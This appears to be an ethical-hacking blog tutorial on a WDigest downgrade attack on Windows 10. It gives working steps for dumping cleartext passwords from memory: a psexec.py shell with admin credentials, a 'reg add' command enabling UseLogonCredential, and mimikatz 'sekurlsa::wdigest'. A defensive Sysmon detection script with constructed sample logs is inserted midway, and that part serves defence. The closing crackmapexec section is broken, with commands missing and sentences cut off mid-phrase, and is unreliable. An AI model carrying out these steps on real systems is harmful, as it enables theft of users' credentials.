By default wdigest is disabled on Windows 10, but not removed. You can enable it with a registry change. This is a short and sweet tutorial on how to dump Windows passwords by exploiting wdigest in a wdigest downgrade attack. I demonstrate how to exploit the challenge-response protocol wdigest to extract cleartext credentials through mimikatz and by using the crackmapexec module.
The attack involves making a registry change to the WDigest setting in the local group policy settings on the target. From an attacker's perspective, making an unauthorized registry change requires local admin permissions on the target.
As a local administrator I am going to make one little registry change to make this attack possible.
I am going to use this command to set the wdigest registry value to 1 in the Windows registry. Then I use mimikatz for this simple example.
Here are the steps to exploit wdigest to dump user credentials from memory:
- Open a shell on the BEHWIN10 target using Impacket's psexec.py (must be admin level creds):
  python3 psexec.py {user}:{pass}@target
- Use this command to edit the registry key that disables wdigest by default on Windows 10:
  reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
- Logon as a new user, here I am using wa-kennyp.
- With your shell still open, run mimikatz to start Mimikatz, then run sekurlsa::wdigest.
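The registry change above is the one artifact a defender can reliably watch for: the value only exists when someone has re-enabled plaintext credential caching, and the reg add that writes it is logged by Sysmon as a RegistryEvent (Event ID 13, SetValue) if the configuration has a rule for the WDigest key. The following detection script is an added example, not part of the original tutorial; the log lines it runs over are constructed in a simplified key=value form rather than copied from a real Sysmon export, and it assumes Sysmon records the DWORD in its Details field as "DWORD (0x00000001)". It flags any SetValue on UseLogonCredential whose new value is non-zero, under either CurrentControlSet or a resolved ControlSetNNN path, and ignores writes that set it back to 0 (the remediation the page's default state implies).

```python
"""Flag re-enablement of WDigest credential caching in Sysmon registry events.

Added example (not the tutorial's own code). Input records are constructed,
'|'-separated key=value lines carrying the Sysmon Event ID 13 fields that
matter for this check.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Sysmon may log the live hive path as CurrentControlSet or as ControlSet001 etc.
WDIGEST_VALUE = re.compile(
    r"^HKLM\\SYSTEM\\(CurrentControlSet|ControlSet\d{3})"
    r"\\Control\\SecurityProviders\\WDigest\\UseLogonCredential$",
    re.IGNORECASE,
)
# Assumed Sysmon rendering of a REG_DWORD value in the Details field.
DWORD = re.compile(r"^DWORD \(0x([0-9a-f]{8})\)$", re.IGNORECASE)


@dataclass
class RegistryEvent:
    event_id: int
    event_type: str
    image: str
    user: str
    target: str
    details: str


def parse_record(line: str) -> RegistryEvent:
    """Parse one constructed 'Key=Value|Key=Value' line into a RegistryEvent."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return RegistryEvent(
        event_id=int(fields["EventID"]),
        event_type=fields["EventType"],
        image=fields["Image"],
        user=fields["User"],
        target=fields["TargetObject"],
        details=fields["Details"],
    )


def is_wdigest_downgrade(ev: RegistryEvent) -> bool:
    """True when UseLogonCredential was set to a non-zero DWORD (caching on)."""
    if ev.event_id != 13 or ev.event_type != "SetValue":
        return False
    if not WDIGEST_VALUE.match(ev.target):
        return False
    m = DWORD.match(ev.details)
    return bool(m) and int(m.group(1), 16) != 0


def find_downgrades(lines: Iterable[str]) -> List[RegistryEvent]:
    """Return every record that enables WDigest credential caching."""
    return [ev for ev in map(parse_record, lines) if is_wdigest_downgrade(ev)]


# Constructed sample log: one reg.exe write of 1, one reset to 0, an unrelated
# WDigest value, a key-create event, and a PowerShell write via ControlSet001.
SAMPLE_LOG = [
    r"EventID=13|EventType=SetValue|Image=C:\Windows\System32\reg.exe"
    r"|User=BEHWIN10\Administrator"
    r"|TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"
    r"|Details=DWORD (0x00000001)",
    r"EventID=13|EventType=SetValue|Image=C:\Windows\System32\reg.exe"
    r"|User=BEHWIN10\Administrator"
    r"|TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"
    r"|Details=DWORD (0x00000000)",
    r"EventID=13|EventType=SetValue|Image=C:\Windows\System32\svchost.exe"
    r"|User=NT AUTHORITY\SYSTEM"
    r"|TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\Negotiate"
    r"|Details=DWORD (0x00000000)",
    r"EventID=12|EventType=CreateKey|Image=C:\Windows\System32\reg.exe"
    r"|User=BEHWIN10\Administrator"
    r"|TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
    r"|Details=",
    r"EventID=13|EventType=SetValue|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|User=BEHWIN10\wa-kennyp"
    r"|TargetObject=HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\UseLogonCredential"
    r"|Details=DWORD (0x00000001)",
]


if __name__ == "__main__":
    for ev in find_downgrades(SAMPLE_LOG):
        print(f"ALERT WDigest caching enabled by {ev.user} via {ev.image}: {ev.details}")
```

In a real deployment the parser would read the Sysmon event XML or a SIEM export instead of these constructed lines, but the match logic is the same: a SetValue on UseLogonCredential with a non-zero payload is the downgrade, and the remediation is to write 0 back (the value the page describes as the Windows 10 default) and investigate the user and process that made the change.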
Using Crackmapexec To Exploit Wdigest
First, if you don't know how to install the crackmapexec Docker image, do that. It is much easier than installing from source or using one of the releases, because of the many dependencies. Check the wiki to see all the options.
Once you have installed Docker on Kali Linux, then pull the crackmapexec image from Docker Hub,
Now start a new container from the newly acquired image.
docker inspect crackmapexec. The second field is the path where the file or directory is mounted in the container. Finally, byt3bl33d3r/crackmapexec is the image name. In other words,
You may know that crackmapexec has modules built-in for various tasks. You can list the possible options using
Finally move to the
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.